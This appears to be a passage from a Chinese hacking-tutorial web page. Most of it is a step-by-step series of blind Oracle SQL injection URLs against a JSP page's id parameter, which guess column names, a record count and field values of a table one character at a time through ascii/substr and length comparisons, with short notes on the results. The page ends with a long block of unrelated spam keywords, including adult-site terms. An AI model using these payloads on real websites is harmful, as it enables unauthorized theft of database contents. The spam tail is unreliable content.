http://www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 84>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),3,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 87=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 87>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 84=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 87=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 87>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),6,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 86=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 86>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 88=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 88>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 89=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),7,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)


第一個(gè)記錄的第一位值為:
4、 猜解數(shù)據(jù)值:

 數(shù)據(jù)值長度為一位:1

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM AD)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM AD)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT COUNT(*)FROM AD)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT COUNT(*)FROM AD)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT COUNT(*)FROM AD)),0)

 數(shù)據(jù)長度為:9條記錄
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM AD),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 55=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 55>ascii(substr((SELECT COUNT(*)FROM AD),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 56=ascii(substr((SELECT COUNT(*)FROM AD),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 56>ascii(substr((SELECT COUNT(*)FROM AD),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 57=ascii(substr((SELECT COUNT(*)FROM AD),1,1))

以下猜解記錄值
 第一行第一列記錄的長度為:1,值為:1
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))


 第一行第一列記錄的長度為:1,值為:2

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))


 第二行第一列記錄的長度為:1,值為:2

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))


 第二行第二列記錄的長度為:1,值為:2

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49>ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

http://www.test.net/index_kaoyan_view.jsp?id=117 And 50=ascii(substr((SELECT ID FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))


 猜解第三個(gè)記錄的長度為:(其它記錄依次類推)

http://www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 0>nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 1=nvl(length((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))
http://www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT CLASS FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM AD ORDER BY 2ASC)WHERE ROWNUM<=3)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))




熱詞搜索:

上一篇:教您15招保養(yǎng)筆記本硬盤
下一篇:網(wǎng)絡(luò)流行黑客軟件簡介

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
国产亚洲成精品久久| 国产亚洲欧美色| 亚洲尤物在线| 99这里只有精品| 日韩视频免费大全中文字幕| 亚洲视频一起| 午夜一区二区三视频在线观看| 欧美一级片在线播放| 欧美 亚欧 日韩视频在线| 欧美午夜精品伦理| 国内外成人免费激情在线视频| 亚洲高清在线| 亚洲小说欧美另类社区| 久久久91精品国产一区二区三区| 蜜臀va亚洲va欧美va天堂| 欧美jjzz| 国产日韩欧美亚洲一区| 亚洲国产精品va在线看黑人动漫| 午夜精品福利一区二区三区av | 亚洲精品欧美日韩专区| 亚洲视频999| 欧美国产日韩免费| 国产综合色在线视频区| 亚洲深夜福利在线| 欧美久久久久久久久久| 精品成人一区二区三区| 久久国产精品72免费观看| 欧美日韩国产va另类| 在线观看亚洲视频| 久久久久久久成人| 国产精品一二一区| 9人人澡人人爽人人精品| 久久久国产午夜精品| 国产精品久久久久久亚洲毛片| 亚洲第一黄网| 性欧美大战久久久久久久久| 欧美日韩一级黄| 亚洲精品视频在线| 久久亚洲私人国产精品va媚药| 欧美性猛交一区二区三区精品| 一区二区三区成人| 欧美激情中文字幕在线| 亚洲日本精品国产第一区| 久久亚洲欧洲| 影音先锋另类| 久久综合精品一区| 在线不卡a资源高清| 久久久久久电影| 激情成人综合| 久久亚洲视频| 日韩亚洲欧美精品| 国产精品女主播一区二区三区| 午夜精品在线视频| 国产精品久久久久久久app| 亚洲午夜精品网| 国产欧美日韩视频一区二区三区| 欧美亚洲一区在线| 精久久久久久| 欧美国产精品久久| 午夜日本精品| 亚洲免费高清视频| 国产欧美日韩综合| 久久久久久亚洲综合影院红桃| 亚洲电影在线看| 欧美人妖在线观看| 亚洲女女做受ⅹxx高潮| 国产日韩一区二区三区在线| 久久久精品久久久久| 99亚洲伊人久久精品影院红桃| 国产精品九九久久久久久久| 亚洲一区久久久| 国产一区二区三区电影在线观看 | 国产欧美日韩免费| 美日韩精品免费| 亚洲精选在线| 国产精品一级| 欧美精品一区二| 欧美一区二区三区在线观看视频 | 亚洲欧美综合国产精品一区| 国产亚洲视频在线观看| 欧美日韩成人综合| 久久久久久久性| 亚洲专区国产精品| 亚洲国产精品高清久久久| 国产精品网站在线播放| 欧美日韩精品一区二区在线播放| 久久综合色8888| 久久激情综合| 亚洲视频欧美视频| 日韩亚洲精品在线| 1204国产成人精品视频| 狠狠色香婷婷久久亚洲精品| 欧美日韩一区二区三区在线看| 久久久久久自在自线| 久久国产66| 欧美亚洲视频在线看网址| 亚洲制服av| 亚洲第一在线综合在线| 国产一区二区三区自拍| 国产精品久久久久久久一区探花| 欧美日韩国产页| 欧美激情bt| 免费欧美在线视频| 久久久99精品免费观看不卡| 欧美一级网站| 久久久青草婷婷精品综合日韩| 欧美亚洲在线观看| 久久国产黑丝| 久久夜色精品国产欧美乱极品| 久久综合给合| 欧美另类69精品久久久久9999| 欧美激情bt| 欧美三日本三级少妇三2023| 欧美女主播在线| 欧美视频一区二区三区四区| 国产酒店精品激情| 国产视频在线观看一区二区| 黄网站色欧美视频| 91久久精品国产91性色| 亚洲麻豆av| 亚洲一区亚洲| 久久九九电影| 欧美日本视频在线| 国产精品嫩草影院av蜜臀| 国产一区99| 亚洲精品视频一区二区三区| 亚洲欧美国产一区二区三区| 久久岛国电影| 欧美精品久久久久久久| 国产精品国产三级国产专播精品人 | 欧美日本视频在线| 国产精品久久久久av| 国产婷婷色综合av蜜臀av| 精品成人一区二区三区| 亚洲精品视频二区| 欧美一区二区高清在线观看| 久久综合中文色婷婷| 欧美日韩国产小视频| 国产精品一区二区三区久久久| 精品69视频一区二区三区| 一区二区欧美激情| 久久久精品国产免大香伊| 欧美成人dvd在线视频| 国产精品高潮呻吟| 国产夜色精品一区二区av| 中文av一区特黄| 老司机午夜精品| 国产精品实拍| 亚洲精品视频一区二区三区| 香蕉久久夜色精品国产使用方法| 欧美好吊妞视频| 伊人精品成人久久综合软件| 亚洲网址在线| 欧美丰满少妇xxxbbb| 国产在线不卡视频| 亚洲午夜激情网页| 欧美人与禽猛交乱配视频| 伊大人香蕉综合8在线视| 亚洲欧美bt| 欧美三区在线观看| 亚洲狼人精品一区二区三区| 久久久久国内| 国产日韩一区二区三区在线| 99精品国产热久久91蜜凸| 久久理论片午夜琪琪电影网| 国产精品久久777777毛茸茸| 亚洲精品在线观看视频| 老司机午夜精品| 韩国一区二区三区在线观看| 亚洲欧美在线另类| 国产精品www994| 一区二区高清视频| 欧美啪啪一区| 99av国产精品欲麻豆| 欧美精品aa| 日韩一级大片| 欧美日韩日韩| 一区二区精品在线观看| 欧美日韩国产大片| 亚洲免费电影在线| 欧美日韩一级片在线观看| 艳女tv在线观看国产一区| 